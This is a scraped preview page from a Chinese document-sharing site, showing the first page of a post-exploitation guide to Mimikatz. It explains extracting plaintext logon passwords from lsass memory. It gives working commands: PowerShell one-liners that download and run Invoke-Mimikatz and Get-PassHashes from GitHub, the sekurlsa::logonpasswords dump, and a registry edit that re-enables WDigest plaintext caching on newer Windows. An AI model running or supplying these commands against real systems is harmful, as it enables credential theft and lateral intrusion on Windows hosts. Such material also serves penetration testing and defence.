暂无图片
暂无图片
暂无图片
暂无图片
暂无图片
[后渗透]Mimikatz使用大全.pdf
73
14页
0次
2022-09-04
5墨值下载
/
[后渗透]Mimikatz 使用大全
Mimikatz 是一款功能强大的轻量级调试神器,通过它你可以提升进程权限注入进程读取进程内
存,当然他最大的亮点就是他可以直接从 lsass.exe 进程中获取当前登录系统用户名的密码,
lsass 是微软 Windows 系统的安全机制它主要用于本地安全和登陆策略,通常我们在登陆系统
时输入密码之后,密码便会储存在 lsass 内存中,经过其 wdigest 和 tspkg 两个模块调用后,
对其使用可逆的算法进行加密并存储在内存之中, 而 mimikatz 正是通过对 lsass 逆算获取到明
文密码!也就是说只要你不重启电脑,就可以通过他获取到登陆密码,只限当前登陆系统!
注:但是在安装了 KB2871997 补丁或者系统版本大于 windows server 2012 时,系统的内存
中就不再保存明文的密码,这样利用 mimikatz 就不能从内存中读出明文密码了。mimikatz 的
使用需要 administrator 用户执行,administrators 中的其他用户都不行。
这里放几个神器的运行姿势:九种姿势运行:Mimikatz:
https://www.freebuf.com/articles/web/176796.html
借用 PowerShell
# ( )
powershell IEX (New-Object
Net.WebClient).DownloadString('https://raw.githubusercontent.com/mattifestation/PowerSploit/master/E
xfiltration/Invoke-Mimikatz.ps1'); Invoke-Mimikatz –DumpCerts
# hash ( )
powershell IEX (New-Object
0x00 简介
/
Net.WebClient).DownloadString('https://raw.githubusercontent.com/samratashok/nishang/master/Gather/G
et-PassHashes.ps1');Get-PassHashes
下载 mimikatz 程序,找到自己系统对应的位数,右键以管理员身份运行:
#
privilege::debug
#
sekurlsa::logonpasswords
当目标为 win10 或 2012R2 以上时,默认在内存缓存中禁止保存明文密码,但可以通过修改注
册表的方式抓取明文。
cmd 修改注册表命令:
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t
REG_DWORD /d 1 /f
#
0x01 获取本地帐户密码
1.1 本地执行
1.2 SAM 表获取 hash
of 14
5墨值下载
【版权声明】本文为墨天轮用户原创内容,转载时必须标注文档的来源(墨天轮),文档链接,文档作者等基本信息,否则作者和墨天轮有权追究责任。如果您发现墨天轮中有涉嫌抄袭或者侵权的内容,欢迎发送邮件至:contact@modb.pro进行举报,并提供相关证据,一经查实,墨天轮将立刻删除相关内容。

评论

关注
最新上传
暂无内容,敬请期待...
下载排行榜
Top250 周榜 月榜